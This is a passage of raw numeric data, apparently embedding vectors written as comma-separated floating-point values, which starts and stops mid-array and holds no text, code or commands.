.009679809,-0.009374708,0.008703466,0.017749196,0.023631893,-0.030325493,-0.013350781,-0.0054437662,0.047606118,-0.014070033,-0.017181277,-0.036918323,-0.019509548,-0.0017851751,-0.01340817,-0.010883148,0.014590189,-0.0029858658,-0.0024571246,-0.0060530184,-0.024218705,-0.008340399,0.0066948268,-0.006882396,-0.012206484,-0.032216877,-0.015392809,0.002531891,0.010019184,0.003660456,-0.0013981694,0.00023483382,0.003846865,0.002096042,0.014849112,-0.0031743385,0.024879688,-0.014854164,-0.009151381,-0.0014500527,0.010619379,0.018970715,0.013069679,0.0068369214,0.04044656,0.022547193,0.0009940185,0.009242198,-0.00736042,0.024564812,0.014828347,-0.022371795,-0.012658786,0.0036111225,0.014652011,0.017535385,0.010977654,0.0051447055,0.011131886,0.0285828,0.025639584,-0.009837636,-0.022934025,0.0208706,0.007323238,0.011442743,0.0022517107,0.018446181,0.007025922,-0.008940373,0.0042655678,0.007200977,0.01511646,-0.0047591594,0.0068904455,0.0059845084,-0.009641898,0.0012530822,-0.023769116,0.003653814,0.0074234386,-0.01889475,0.00022685394,-0.0022332415,-0.0064444663,0.00911913,-0.023907235,-0.0046255095,-0.005993271,0.016929511,-0.012851252,-0.00833384,0.021339662,0.015732663,0.012764503,-0.013974772,-0.0023052685,0.0186041,-0.025101544,-0.0068214894,-0.0037146115,-0.01399738,-0.035442315,-0.019009268,0.010250924,-0.037895896,0.024299067,0.0039829216,0.006866888,-0.011667117,-0.011724052,-0.008505081,0.018386776,-0.012344267,0.027230572,-0.00024247904,-0.040575206,0.022444982,-0.0012958156,-0.012222541,0.008083431,-0.0050919014,0.0411495,0.0026028682,-0.0062350472,0.007933975,-0.0003654209,-0.013162761,-0.017096752,-0.019688193,-0.0039129257,-0.02127948,-0.0048064166,0.0039741555,-0.0018829572,-0.03106177,0.03361028,-0.012223075,0.019681472,-0.0069728903,-0.0323195,0.0020370993,0.010528723,0.027878603,0.015089759,-0.029552737,0.032381102,0.014466743,-0.039050538,-0.006551829,0.0016157645,-0.01071496,-0.01673386,-0.0005677468,-0.0019066839,-0.011619221,-0.015475766,-0.019880861,0.0029724496,0.014033374,0.0061801425,0.008102495,0.03201273,0.0259352,0.0012928197,-0.01197535,-0.024162933,0.004453451,0.012316322,0.010347248,0.008138288,0.023092406,-0.0027697308,0.010672495,0.011073078,-0.03089664,0.007883737,0.008756018,0.008458879,-0.025042685,0.003248609,-0.010630812,-0.002373703,0.0064638825,-0.013160873,-0.018456472,0.04066245,-0.003324969,-0.02151375,0.006966407,0.021841403,0.00086552557,0.0035691238,0.0077553717,-0.000072920484,-0.009963802,-0.0019831583,-0.029433966,-0.008225303,-0.007032232,0.018239494,-0.008838388,-0.012202039,-0.0013200934,-0.007640918,-0.01457257,0.01007888,0.00032808704,0.024061216,0.01703593,0.0065747574,0.009710063,0.014832932,0.00011229421,0.015615179,0.016434327,0.0066210837,0.0026349158,-0.014697763,0.010974552,-0.002292938,-0.0012210476,0.006460847,0.007030318,-0.032692768,0.027543942,0.0104593355,0.027480999,0.0070906794,0.02600408,-0.0011546947,-0.02367946,-0.023335638,-0.0031428847,-0.002085593,0.006303513,0.010711094,-0.0032082316,0.014269061,-0.003920574,-0.0012417777,0.076275915,-0.013678634,-0.002805298,0.00018408977,0.007781942,-0.0043397765,0.012918495,-0.0131214475,-0.00051152566,-0.013423876,-0.01602264,-0.010440394,-0.018190663,-0.012290641,0.0035406547,-0.0083640935,-0.008387531,0.0049582785,0.021362904,0.001736588,0.0074070543,0.006744337,0.00877206,0.0016106003,0.0105561605,0.017093588,0.009702738,-0.0153321065,0.016050994,0.016173756,0.0017504112,-0.009671223,0.004525842,0.01721509,-0.0055791587,-0.009193592,-0.014682396,-0.002826523,-0.020213118,0.01425985,0.0025657613,-0.0036349155,0.03286118,0.003998562,0.017376862,-0.019251555,-0.008639521,-0.007337275,-0.018350063,-0.004184017,0.0079320455,-0.0031110463,-0.014570256,0.0098815635,-0.0079200035,0.021877704,0.008119481,0.009884963,0.015445099,-0.0037298924,0.006291015,0.013839509,-0.0012310421,-0.0059974263,0.0037498432,0.013379694,-0.012736138,-0.010414911,0.007701695,-0.02636902,0.0010994241,0.0007685722,0.008942796,0.025724383,-0.013177529,0.009697673,-0.0046162847,-0.004496292,-0.03165037,-0.026757808,-0.019987846,-0.0009696921,0.026644355,0.028744144,-0.00949208,0.014267219,0.0064832144,0.0073838113,0.04730888,-0.011510769,0.016408788,0.003441937,0.0040386366,0.010740057,0.008423067,0.023421653,-0.025250249,0.013695656,-0.016507462,0.032368295,0.020504247,0.0015722945,0.0067244438,-0.024481744,-0.0054293317,-0.009595576,0.0037266158,-0.017614346,0.018055523,0.03278833,0.008041443,-0.0042034625,0.003880875,0.017282087,0.01076572,-0.0068148957,-0.001558243,-0.003035155,-0.019991487,-0.0009832303,0.008860175,-0.015626496,-0.027798157,-0.04557199,-0.0029971183,0.122021474,-0.012375411,0.019177366,0.0067049838,0.0049562166,-0.004532986,-0.14661743,0.021980425,0.0063183648,0.016513947,-0.0044934354,-0.0013231823,-0.009019976,0.01856863,0.012678064,-0.012571134,-0.013599311,-0.015382502,0.017507555,-0.015646705,-0.008285864,0.016087418,0.00044635785,0.010644666,-0.0073735723,-0.00913785,-0.00037593947,-0.005005812,0.0033321406,-0.018014085,0.000009178678,0.003032472,0.010396844,-0.006575387,-0.023345537,0.007350849,0.022460032,0.010495535,-0.024169369,-0.020838603,0.023802223,-0.0019957041,-0.015336672,-0.028914936,-0.15688495,0.0051831757,0.0050715758,-0.040876254,0.006679018,0.009619785,-0.007154716,0.009531932,-0.0018791629,-0.0069940328,-0.006066636,0.027590476,-0.01643211,-0.0073568807,-0.023722904,-0.008440616,0.009366603,0.010614484,0.0038528698,0.0056829527,0.009023337,0.004344464,-0.020688223,0.0026649274,-0.008880368,0.005375117,0.012766956,0.029290766,0.0045142625,0.011389615,-0.019532474,0.009344734,-0.029559247,-0.0012203918,-0.0032518264,-0.011260679,0.00085933105,-0.0000054452125,-0.022164594,0.012652051,-0.003700947,-0.00078888773,-0.010682954,0.004932143,-0.0007199437,0.0075576263,-0.010271346,0.013907081,0.0122123575,-0.0037032154,0.041573398,0.0123994965,-0.02369629,0.02056391,0.0006810982,-0.0048588957,-0.008500495,-0.021050937,0.0022746134,-0.010460252,-0.005590322,0.010322796,-0.02080677,-0.0049203113,0.046851695,-0.007662893,-0.00045539346,-0.019036638,0.00030297687,-0.0026832724,-0.0074471203,-0.0026752448,0.005218642,-0.012904557,0.004436439,0.015434677,0.0040548453,0.011563446,0.010703256,-0.025084551,0.022069909,-0.018195724,0.0015824011,-0.039868087,0.011838591,-0.022597976,0.0042284187,-0.003535344,-0.00543161,0.014069605,0.031225141,0.0013399542,0.010732772,-0.022720676,0.033480294,0.013969972,0.05059748,-0.0032317047,-0.017880198,0.002993606,0.00005361583,-0.013605632,-0.014225228,-0.008915616,-0.0032784655,0.003664975,0.0029615855,-0.014667349,-0.025316136,-0.006928984,0.004942953,-0.0047781765,0.017922828,-0.013277005,-0.017786292,-0.028110716,0.008725046,-0.002406883,-0.003248993,-0.020412449,-0.025503233,0.010796676,-0.000078173325,-0.00055552763,0.05129843,-0.0023840438,-0.022532694,-0.0054881573,-0.018755615,0.008978697,-0.0076880013,0.016629536,0.0059453864,-0.010369421,-0.021771515,-0.006522954,-0.021247916,0.012492706,-0.020682935,0.016654558,-0.009165063,-0.00425219,-0.014029452,-0.0037019805,0.017487206,-0.015538791,0.010955897,-0.0027140682,0.028792478,0.014854451,0.012540843,0.03541066,-0.020453783,-0.0016990454,0.029460356,0.04714361,0.009031162,-0.007193235,0.014911509,0.018284634,0.014295871,0.028031724,-0.0054521575,-0.014584966,-0.007271956,-0.028110743,-0.008274344,0.0010368156,0.036938068,-0.009981855,-0.000078493016,0.00058899453,0.014534762,0.0024531418,-0.0026037314,0.0027976183,-0.026803229,-0.024758093,0.029693544,0.0046964968,0.0018491265,0.017600706,-0.0054449257,-0.00839437,-0.008575248,-0.020264288,-0.017153203,-0.007559,0.0005444594,0.011318603,-0.044989243,-0.028686728,-0.01096264,0.011075953,-0.03301782,0.002969757,0.001353608,0.003186129,-0.010649985,-0.0021019697,-0.026895257,-0.018261285,0.0070335423,0.009372631,0.004442407,0.005986871,0.006290961,-0.0060659186,0.0017566404,0.01665173,-0.017916953,-0.014752481,0.002957619,-0.011505368,-0.0061228615,0.020696055,-0.018046074,-0.007848278,-0.016287426,-0.007341598,-0.015331825,-0.006176945,-0.0030918568,-0.006578851,0.022042349,-0.0047869757,-0.009524192,-0.031482045,0.0105432635,0.01723439,-0.0019224768,-0.021350846,0.010460781,-0.027324362,0.024773547,0.005642992,0.033041738,-0.0066469326,-0.0028600688,0.0036265906,-0.03114738,-0.015460896,0.046482127,-0.02934042,-0.0125088785,0.014713087,0.026182817,0.017835744,0.0015030978,0.018027697,0.031681005,0.011590009,0.002144498,0.021922057,-0.0012978637,0.025642127,0.01787611,0.003874259,-0.0050864164,-0.004211393,-0.00727682,0.0017587559,0.020295767,0.015791649,0.0033750124,0.012498193,-0.018057665,0.003770482,-0.029817412,0.0025416268,0.05093152,-0.0041778465,-0.0027114793,0.020194719,0.0044750897,-0.025651589,-0.0016716724,0.018942984,0.010905812,0.01718244,-0.021171715,0.019102348,0.014537356,-0.036937736,0.019730313,-0.013591995,0.023535807,0.013004144,-0.0075962427,-0.004664582,-0.008430274,0.032379143,0.0018570017,0.012251932,0.03283596,-0.016729472,-0.01589578,-0.003476661,0.0021886895,-0.009654847,0.0113787195,0.0003791881,-0.013111325,-0.006516957,0.002673831,-0.013493466,0.015176259,-0.008891871,-0.009499513,0.004682524,0.0052048196,-0.0133440485,0.005176467,-0.007136612,-0.026051369,0.008729264,0.028963538,0.012488689,-0.00002525728,-0.02404669,0.013775013,0.044878285,-0.006706114,0.014479301,0.0008309582,0.017876372,-0.011768686,-0.0077783144,-0.007292594,-0.0023440972,-0.023391582,0.004520001,0.023383759,-0.011749898,-0.027716914,0.0008173058,-0.0017110285,-0.0023164316,-0.005002263,0.0048270617,0.0285013,0.0023716355,0.032472286,-0.02050564,-0.0045254794,-0.0017469232,-0.00821872,-0.021095762,0.00662803,-0.018347621,0.004434608,0.017855521,-0.008951688,0.006588107,0.010500032,0.03457307,0.007677898,-0.014632376,-0.012395522,0.007473553,-0.004043995,-0.018065074,-0.041646607,-0.001635724,-0.015895832,-0.022742242,-0.009925934,-0.016732983,0.014320293,0.013728356,-0.023454746,-0.0042726104,0.030640034,0.003281713,-0.017199116,0.013561341,0.0057942765,0.0062871757,-0.0043555535,0.0027572047,-0.0014382992,-0.012963696,0.04765412,-0.021198405,0.01229438,-0.0016940435,0.03388118,0.008854025,-0.012489306,0.003346633,0.011462928,-0.025757017,-0.014122761,-0.03847442,-0.0069843843,-0.013305867,-0.026041515,-0.015084892,0.00384098,-0.0057872264,0.0033310286,0.00045001548,-0.00046647308,0.018152805,0.029692063,0.015158482,-0.017703338,-0.024086123,0.0016265428,0.00003059164,-0.022582512,0.013822704,-0.00003551483,-0.0009845006,-0.041476384,0.00374925,-0.011398925,-0.020465888,-0.0014483131,-0.028185898,0.0089200465,-0.0015491502,0.026512343,0.019018512,0.0095768105,0.018493902,0.0035917703,-0.009322812,-0.017623289,0.020719072,-0.014411931,0.006039249,-0.015320377,0.0011677187,0.02155356,0.012116814,-0.024296291,0.03976518,0.012804346,-0.007251603,-0.0104026925,0.012951494,0.017537707,-0.0011730012,-0.034033097,-0.01646518,0.0272397,0.017519789,-0.00413621,-0.028709667,-0.00075181545,-0.016858654,-0.018247763,0.000077812256,-0.002356202,0.011876322,0.009007253,-0.0046366677,0.030288657,0.003879622,-0.022959482,0.026786136,0.013013141,0.0028312078,0.0016130072,-0.009553214,0.004413978,0.023920244,-0.0045268047,0.018186972,-0.022822447,0.015855404,0.053372554,-0.0017229811,0.035749733,0.008719737,-0.008317286,0.003594841,-0.014124685,-0.0334918,0.02483181,-0.032610796,-0.020670468,-0.018427087,-0.035093743,-0.0011043679,-0.015095939,0.010163143,-0.123455204,0.008160313,-0.022344602,-0.012464771,-0.015679808,-0.01645326,0.009056886,0.009017166,0.0018399197,-0.018191567,-0.0035785278,0.0338121,0.0022875208,-0.012303106,-0.0139447125,0.0011848381,-0.030111853,-0.012907402,-0.009248527,0.013357966,0.03312174,-0.010319272,-0.009006818,0.0057664495,-0.009476784,0.003167061,-0.00805164,0.01072659,0.012266143,0.012292773,-0.010888252,0.010367771,0.011045004,0.017371599,0.005468117,0.009742064,0.0048852353,0.016977454,-0.0028849007,0.015314794,-0.004831826,0.0045718523,0.008865891,-0.0048710755,0.0151631525,-0.006480532,0.012315245,0.0151104545,0.031355795,0.015764896,-0.007802239,0.0022336035,0.0047637536,-0.01792541,-0.016880501,0.0019259976,0.0073259175,0.01571487,0.005054828,0.0075755543,-0.013518165,-0.0039155344,0.0017553159,-0.014093706,0.010400828,0.0059615853,0.0036281613,0.00903451,-0.024923064,0.00012489686,-0.0018495684,0.038203035,0.0029616226,-0.0094275,-0.0019535294,0.019639278,-0.006194095,0.0008499601,-0.011707616,0.028294187,-0.04737277,-0.011552972,0.013730279,0.04685191,-0.010236556,-0.023819977,0.018466137,0.0021921322,-0.024841234,-0.010782936,0.017458487,0.0036990473,-0.003906417,-0.001749036,-0.0063443654,0.019050604,-0.014750848,0.012581507,-0.013934481,0.010306094,-0.0059191776,0.011939179,-0.0019064331,-0.02933338,-0.12080179,-0.0093744835,0.0047276733,0.010415192,-0.0076795714,-0.02955808,0.013839558,0.00048811678,0.03262642,0.012025647,-0.01230083,0.008847033,-0.011876977,0.0035737325,-0.008252391,0.003073749,-0.022089602,0.02035886,-0.00033654246,-0.024887959,0.006040552,-0.015456604,-0.0104514705,0.018582424,0.0053151874,0.010840335,0.00961209,0.027611647,0.01774046,-0.008701589,-0.006976134,0.0000571275,-0.0038166489,0.0021821426,-0.054959394,0.00095798995,0.008454626,-0.0048135435,-0.017338458,0.02005796,0.0052171294,0.0038961263,0.030558212,0.027883394,-0.0033931495,-0.016312154,-0.00018163613,0.019398047,0.0080006365,-0.012123553,-0.022610817,0.0010976718,-0.02389324,-0.012297452,0.006412259,-0.0138698565,0.007991285,0.005611598,0.015403013,-0.0075725843,-0.0125544425,0.007965729,0.0023770651,0.009225935,0.000111003996,0.012619299,-0.0026762087,0.02203103,-0.0124065615,0.010760653,0.005067524,0.019729123,-0.0053060884,-0.0071243094,0.016143335,-0.0013417604,-0.0050712307,0.026185548,0.02064723,0.0056274403,0.016700435,-0.013833362,-0.0083411075,0.027485456,-0.022008274,0.022981012,0.008940234,-0.004129083,-0.019712338,-0.0035945363,0.030027023,0.0063537033,-0.0041333856,0.031341,0.0047906116,0.008354902,0.05222424,-0.007564128,-0.023655342,-0.01556771,-0.0055468953,-0.015875416,-0.0053332155,0.003286112,-0.022082467,0.011695668,0.020934045,0.007014679,0.012914649,0.0004344311,-0.0077392296,0.03976744,-0.018871894,0.0073858965,0.0038985894,0.005109936,-0.014126373,-0.011975107,-0.0045407093,-0.0077572493,0.011646158,-0.0034752018,-0.00449047,-0.02722397,-0.011697698,-0.02874771,-0.01638811,0.032693785,0.0011771237,-0.036310807,-0.0032239186,0.019578049,0.015392976,-0.0107956575,-0.015875699,0.026243208,-0.009957193,0.014618987,0.018543048,-0.00067916623,0.005654817,0.005811158,-0.0026930429,0.0028659035,0.004676949,-0.012571576,-0.01758194,-0.0023420276,-0.029921561,-0.00057074655,0.00303154,-0.01745261,0.00995998,0.031536054,0.018728686,0.007889213,-0.013019385,-0.01715285,-0.002202648,0.025272701,-0.00019114018,0.03683353,0.017936291,-0.04045635,-0.019092655,-0.012280954,-0.0040579033,-0.0055442154,0.0062020016,0.01414694,0.0061079855,-0.0021738976,0.025331484,-0.05151381,0.020039931,0.0061156345,0.0048043514,0.031403985,0.037833475,0.020472977,-0.013317036,0.015189023,-0.006246072,-0.012569954,0.011726713,0.019416768,-0.0021944009,-0.027632706,0.0057048756,-0.009062481,0.032712273,0.009498357,0.006784493,-0.019447055,-0.0139095755,0.005823312,0.0053922012,0.024648583,0.009842076,-0.012851439,-0.016227404,0.01051057,0.021989882,0.009888144,0.013825606,-0.014856033,0.0016718138,0.016261058,0.0013153327,-0.017888531,-0.01860833,0.00024672213,-0.0035899114,-0.0028173109,0.008529337,-0.001598796,-0.019051459,-0.025897488,0.0037170853,0.010875948,-0.02660187,-0.02991233,0.0065489216,-0.01966283,-0.001999305,0.026352268,0.020615146,0.012362347,-0.0045315144,-0.006917577,-0.0000182968,-0.0032393553,-0.041179407,-0.012946195,0.02059076,0.013094743,0.037688326,0.017705124,-0.004203829,-0.00088509417,0.029282784,0.033085167,0.024602443,0.016441578,-0.00018187978,-0.0054332456,-0.012925811,-0.0108626075,0.0077248337,0.03824933,0.00258861,0.006792937,0.0018257789,0.01074771,-0.013367896,0.010974966,0.02069594,-0.0018043884,-0.007016177,0.00473124,-0.0313584,-0.01615975,-0.0073262826,-0.02610146,0.004415646,0.008680576,-0.012877745,-0.02069271,0.009445226,0.002786596,0.015444631,-0.007438101,-0.013150656,0.014849966,-0.009002365,0.009485306,-0.009461578,-0.0041833865,0.0010050596,0.008397161,0.017277388,0.0019637824,-0.011373007,0.039929945,0.0040835924,0.00003301463,0.016247539,0.013381582,-0.036502916,-0.008336242,0.028847389,0.0051676324,0.018587582,0.0004017824,-0.017864028,-0.0039563226,-0.0029784616,-0.0050006686,0.0045238547,0.02754082,0.03302489,-0.019368095,-0.007306819,-0.011173298,0.0027781841,-0.0059577217,0.007442899,0.005459672,0.0026089614,-0.0063286414,-0.024437707,0.022527216,-0.0074618263,0.0134642115,0.0069489507,-0.012954838,-0.00770563,-0.0011950154,-0.043112125,-0.010416158,0.0024385052,-0.00045842666,0.02717252,-0.016342284,0.017460546,-0.0059642917,0.017151713,0.03073959,-0.0226578,-0.0008245135,0.016081885,-0.048782658,-0.008489188,-0.0075591747,0.01438159,-0.0065822797,0.010963376,0.029265577,-0.030005528,0.025173485,-0.0018338731,-0.003061849,0.004680356,-0.0011880716,-0.00442097,0.009076818,0.008999704,0.0030918492,-0.012284733,0.0019953286,-0.0036945136,-0.007927988,-0.012319129,0.008356611,-0.01344679,0.0063283294,-0.028726336,0.0016446847,0.0239556,-0.011987187,-0.010212754,0.012553916,-0.0108877225,-0.028470939,0.0046227956,-0.03359849,-0.021908237,-0.011165614,-0.005122713,-0.008333577,0.009100318,0.008039985,-0.026945705,-0.026110305,-0.006919648,-0.08722026,0.0021814688,0.0076956186,0.013720199,0.035342496,-0.0002444274,-0.007498913,-0.021372475,-0.006838693,0.012762663,-0.0058509186,-0.018732194,-0.028631339,-0.00009082565,0.041674457,-0.024965024,-0.011643206,0.014703355,0.01291031,-0.0073330407,0.00063370535,-0.0027405028,-0.011254015,-0.017234793,0.021150937,-0.01760487,0.00005941822,-0.0124291405,0.004520337,-0.005394788,-0.008735515,-0.00020598389,-0.0056684045,0.013395055,0.00059001206,0.000014110448,-0.010252588,0.029702015,-0.025452627,-0.035387088,0.0017044117,0.009932183,0.005489797,0.0035200664,-0.026503561,0.020098219,-0.023978217,-0.00287773,-0.00095168524,0.00032932317,-0.011280922,0.0032883172,-0.021656858,0.013277422,-0.013237275,0.01385062,-0.0019331482,-0.003462064,0.019582542,0.003798487,-0.02233613,0.0038212466,-0.00018490785,0.007901334,-0.006476125,-0.009838009,0.013042618,0.0028332178,-0.0002667075,0.004754422,-0.011837711,-0.023883672,-0.0035262264,-0.027349018,-0.0072382432,-0.009452367,0.013262554,0.00029013987,-0.0061623086,0.0026592289,0.035422817,0.002491689,0.023548499,0.0022993437,0.00069419434,-0.0017763753,-0.021917919,0.004562378,0.04257678,-0.003249169,-0.03173869,-0.019568179,0.010578591,0.0010647353,0.014951565,0.031743594,-0.010009735,0.0041679977,0.001182249,0.0021506562,-0.0026927022,-0.021556899,-0.011051032,-0.013240002,-0.01058899,0.0022801342,-0.0017880616,-0.00056568306,-0.009404071,-0.031390212,-0.011741891,0.023296569,0.015133917,0.038820762,-0.0030577367,-0.00004641395,-0.012120102,0.0334926,-0.015843103,-0.010764175,-0.010000317,-0.0117830075,-0.012648851,0.03680997,0.02518289,0.0074607446,-0.0055607655,-0.0035665391,-0.011368157,0.004358727,-0.0059543448,0.023321493,0.015646383,0.008395516,-0.0131513905,0.0025461456,-0.0068614087,0.018314047,0.001614076,0.018537551,0.017981628,-0.008708155,0.008069291,-0.009082879,-0.010439975,0.01633415,0.007247815,-0.011833976,0.021061094,-0.02131488,0.013478313,0.007905471,0.000579221,0.004802651,0.0060568377,0.008986544,-0.012267189,0.0066614067,-0.037646186,-0.003994283,0.0019362457,0.0074004005,0.0061716517,-0.0099682305,-0.02021455,0.029095618,0.009290761,-0.008504963,-0.0021057217,-0.0023236983,-0.023514008,-0.013586036,0.0057742144,-0.0056227553,-0.016404932,-0.007681183,0.035494197,0.006192194,-0.009819634,-0.006399884,-0.0073625455,-0.008997152,-0.021598661,-0.013408246,0.0066325897,-0.012873771,0.0057264697,-0.00249995,0.008914873,0.013018985,0.0063594333,-0.022860667,-0.02076207,-0.027291255,-0.016987043,-0.01292672,-0.00014288798,0.0045181806,-0.01290007,-0.002782187,-0.006132579,0.016709134,-0.0072446126,-0.0009570741,0.035869986,0.0035934602,-0.0021895862,0.0193242,-0.008387536,0.0037039348,-0.019548824,0.0062165144,0.013147271,0.10608456,-0.0024885642,-0.0037483356,-0.0004331454,0.006422454,0.009753272,0.009067033,-0.0007158989,-0.0059559247,0.0060782935,0.026091194,-0.026604556,0.024150755,0.0028612637,0.0025998831,0.026554178,0.022288758,-0.0063364683,0.024997396,-0.0034563642,0.0024086777,-0.009566667,-0.008738331,-0.037937105,-0.0073360773,-0.050428,0.035828706,0.029271765,0.0023815618,0.025747214,0.010688095,0.0076078665,0.016819151,0.00919454,-0.009777232,0.008275836,0.01163036,-0.0016765497,0.004359325,-0.022612577,0.015477134,0.017471302,-0.0035821486,-0.028902002,-0.011592837,-0.012282636,0.00032605836,0.008677241,-0.011060085,-0.0033320305,-0.011427715,-0.013454404,0.0022917474,-0.014910988,0.0005488475,-0.023152785,0.006563298,0.013307124,0.0057543907,-0.008214116,0.012794432,0.0060137147,0.014106458,-0.018471038,0.008849511,0.013097612,-0.019107943,-0.0050743106,0.00787963,-0.0044314684,0.0009551985,-0.0051436573,0.0048617725,-0.0025476306,-0.007972932,-0.0045286263,-0.0033608505,-0.009337145,0.019546568,0.0095219975,0.003426326,-0.016287237,0.012684292,0.009687886,0.014051664,0.006289951,0.00091054133,0.0019524057,-0.012263714,-0.018602515,-0.008442448,0.01036059,0.025802277,0.01676691,0.010338694,0.008132568,0.0051577757,-0.0006536375,-0.01406263,-0.0013539651,-0.022488149,-0.01658994,0.0054590614,0.0048904293,0.0038999254,0.0032497798,-0.0067646573,-0.01995989,-0.014944532,-0.0027151883,-0.012458744,0.021931294,0.0005791353,0.01860823,-0.008733438,0.039673537,-0.028106386,-0.013086858,-0.008145817,-0.016813105,-0.0069986046,0.0077768425,0.009150487,0.014469661,0.018785028,0.010108266,-0.021482639,0.0019187023,0.0119424155,-0.0033716075,0.00037673724,-0.027870022,0.011506185,0.01992304,-0.011906656,-0.005725127,0.025362967,0.010110496,0.024640163,0.009414678,0.007039866,-0.0036964933,-0.0069509293,-0.009698583,0.0011470618,-0.039001845,0.028038964,-0.0063553574,-0.008689222,-0.01898663,0.012292216,0.0074407477,-0.020291777,0.010829025,-0.0060752123,-0.0072635147,0.0015331403,0.0023214808,-0.0075153415,-0.009288834,0.015590601,-0.0036958093,-0.003921604,-0.048461646,0.020526089,0.015013426,0.022219414,0.015527097,-0.0102099255,-0.0065940395,-0.01986589,-0.009123855,-0.0028954179,0.014608165,-0.008169182,0.0128054805,0.009173992,0.01367705,-0.014976517,0.004477585,0.0058872886,-0.005491292,0.007161807,0.0040609385,0.0216892,0.00055358454,0.006773582,-0.021874864,-0.002175662,0.03993219,-0.0075576217,-0.010147826,0.0042054355,0.026071277,-0.009554553,0.02159127,-0.03557025,0.05152423,-0.015698606,-0.029383725,0.00031115554,0.00033691182,0.015376378,-0.01682296,0.0052368497,-0.0075771655,-0.00474438,-0.009807615,0.0056317435,-0.015432082,-0.008067306,-0.017111702,0.0072949505,-0.028269008,0.0060692886,0.0053371647,-0.009301514,-0.031213373,-0.018247275,-0.022796597,-0.0042810496,0.012100952,0.004579063,-0.0017366579,-0.0118571585,0.004396337,0.006343606,0.01872859,0.019864134,-0.008505925,-0.035647456,0.01843281,0.016955975,-0.0076049445,-0.035670552,0.011428922,0.032857377,0.024517843,-0.0032110538,-0.0030865713,-0.0048622894,0.009109326,0.020524135,-0.0062247864,-0.015392941,0.009143053,-0.014402391,-0.02025519,-0.004188972,0.0005613641,-0.027904756,0.0027159841,0.0013638397,-0.016897934,-0.02501669,-0.016795553,-0.0004468254,0.013116647,0.0025709122,-0.016240092,0.0056982315,0.01921043,-0.000008179865,0.027870417,-0.00222344,0.0014565951,0.0018397488,-0.012862311,-0.0003622397,0.00771748,0.013223341,0.013973532,-0.010247712,0.03172261,-0.0028424296,-0.0074686343,0.0069069373,-0.005667515,-0.007088966,-0.02368954,0.0047498615,-0.0028092638,-0.01743378,-0.022330035,-0.022042735,0.009317128,-0.00130828,0.0058643776,0.073041774,-0.041436467,0.0064984257,0.02924811,0.00671679,-0.012892466,0.037616704,0.0068874196,-0.017112443,-0.013986555,-0.007913484,-0.010212857,-0.023984,-0.03428924,0.002121224,0.0058818837,-0.011874362,-0.009859091,0.0071548726,-0.019476216,-0.011686904,0.00019230506,0.00057839835,-0.0016247722,0.0031729485,-0.012843527,-0.009364188,-0.013336296,0.016021138,0.018173318,0.021794088,0.01045046,0.02088811,-0.009513845,0.000650938,0.010895106,-0.0025136343,0.013964537,0.0027048655,-0.020413877,-0.018716376,-0.014082999,-0.0046252892,0.007634965,0.0020293838,-0.00007884052,-0.021582432,0.016098648,-0.021138934,0.123678036,-0.003949976,-0.0028234872,0.009528172,0.004553904,-0.009049093,-0.0010200539,0.016788622,0.00885902,-0.0037738783,0.014076963,0.0010274492,0.011624934,0.018710304,-0.012501067,-0.017202562,0.017077943,0.121006675,-0.014249722,0.013603217,0.0056561674,-0.015927464,0.0052162153,-0.0051137316,0.01879241,-0.06590484,0.0029559694,-0.030056389,-0.020282095,-0.011313551,-0.022343881,0.008970385,0.007643013,-0.0024570243,-0.0050017056,0.016032478,-0.007054722,0.007269455,-0.027491823,0.005781602,0.020587496,0.0006158977,-0.0074842796,0.014390843,-0.015342962,0.006895804,-0.03795253,0.0040072105,-0.0069024707,0.0010251369,0.008022539,-0.021166885,0.04086466,-0.010595941,0.008172598,-0.0020116756,0.0064686867,-0.0007824417,-0.030505905,0.028085029,-0.004503449,0.011298944,-0.012927545,0.00928187,-0.0215465,0.009263159,-0.022544444,0.007887953,-0.00593149,0.01802711,0.023338215,0.035482712,-0.014999749,-0.012035965,0.038965262,0.005430916,0.0034694092,-0.0041101133,0.035381556,-0.0011670799,0.015777411,0.01580914,-0.0012828005,-0.005192391,0.0031321794,0.016759058,-0.017025774,0.006463327,0.008645459,-0.013066932,-0.0027428945,0.0137188565,-0.0060007423,0.0009868141,0.034433544,0.028431088,0.0120696165,-0.0034631116,0.021561965,-0.012062458,0.013500219,0.028500035,-0.027560268,-0.017814498,-0.018095268,0.0029091889,0.003590382,-0.020853687,0.0019069806,-0.002166938,-0.0006210061,0.022087872,-0.015268481,0.022270085,-0.0057969596,-0.0043864455,-0.011160142,0.003665248,-0.024063963,-0.004339311,0.0053300518,-0.0115443105,-0.0012351482,0.005538048,-0.02055301,0.007387513,0.008766217,0.02286423,-0.02348153,-0.025922643,-0.007642156,0.0064245863,-0.0042671934,0.053464267,0.012090305,-0.01826669,0.023006773,-0.03868032,-0.03388248,0.0043678232,0.017237505,0.00081454084,0.004446783,0.0036032088,-0.014689095,0.0058524963,0.006713189,-0.008373771],[-0.017126719,-0.0036603152,-0.017676549,0.003241005,0.02272956,-0.0046347175,0.012008409,0.008187146,-0.008492157,-0.009361022,-0.017231513,0.018397465,-0.00602302,-0.011533972,-0.00036304982,-0.017549828,0.022806589,0.0008564792,0.01522495,-0.010605371,-0.00029442113,0.012324486,0.019002154,0.00015807856,0.002615364,0.00009527516,-0.0012710897,-0.006309928,0.004009172,0.01535547,0.0043677613,0.017474487,0.021363463,0.0034631218,0.003293659,0.0135122035,-0.01645224,-0.010247012,0.0021618302,0.0054237694,0.0019398149,0.00018227454,-0.006811681,0.027257461,-0.0033725915,0.0025140576,0.007144135,0.027178137,-0.00882622,-0.0055385577,-0.007366553,0.00691973,-0.013513496,0.015543785,-0.008408069,0.019250682,-0.0012376477,-0.023202294,-0.0026236118,-0.0035042965,-0.009179337,0.001993704,-0.000111701294,-0.010561326,0.019460717,-0.00057750416,0.004289187,-0.0019512333,0.0015359581,-0.018796504,0.00012074712,-0.0071407882,0.008597867,-0.004501975,0.015422677,0.023744782,-0.0036309597,-0.01762438,-0.0013544811,0.018809017,-0.012379197,-0.012714937,-0.023535484,-0.008287842,0.013762474,-0.0056581562,-0.01728145,-0.0063213618,0.002478386,-0.029172255,-0.004727953,0.01392797,0.011721432,-0.0082665095,-0.018569,0.022880267,0.01283923,-0.010936254,-0.011778195,0.026866589,-0.005970237,0.013110001,-0.02618337,0.010474374,0.014208259,-0.02831701,0.0025881452,-0.017063197,-0.004071184,-0.010901864,0.0014517315,0.023193467,0.014855656,0.010877446,-0.010081865,-0.0024004402,0.007612841,0.004203546,-0.0026524176,0.0050692814,-0.014828307,0.021772014,-0.0003376239,0.010681286,-0.0026461224,-0.00403266,-0.011528467,0.0071293865,0.0047579394,0.00689211,-0.015045262,0.0046115504,